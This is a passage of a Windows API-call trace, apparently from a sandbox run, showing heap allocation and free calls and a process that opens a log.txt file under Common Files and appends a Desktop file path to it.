hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.298] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.298] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0168.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0168.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0168.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0168.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0168.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0168.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.300] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0168.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0168.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0168.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.301] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0168.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf0) returned 0x8feba8 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0168.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6b008 [0168.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.335] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.335] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.335] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0168.335] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.335] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0168.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.337] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0168.337] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0xc3a, lpOverlapped=0x0) returned 1 [0168.337] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0168.337] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xc3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.337] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flyingship.flv\r\n", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0168.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3e) returned 0x8db180 [0168.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flyingship.flv\r\n", cchWideChar=62, lpMultiByteStr=0x8db180, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flyingship.flv\r\n", lpUsedDefaultChar=0x0) returned 62 [0168.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.338] WriteFile (in: hFile=0x120, lpBuffer=0x8db138*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db138*, lpNumberOfBytesWritten=0x87f43c*=0x3d, lpOverlapped=0x0) returned 1 [0168.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.338] CloseHandle (hObject=0x120) returned 1 [0168.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0168.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0168.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0168.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0168.355] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0168.355] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.357] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, 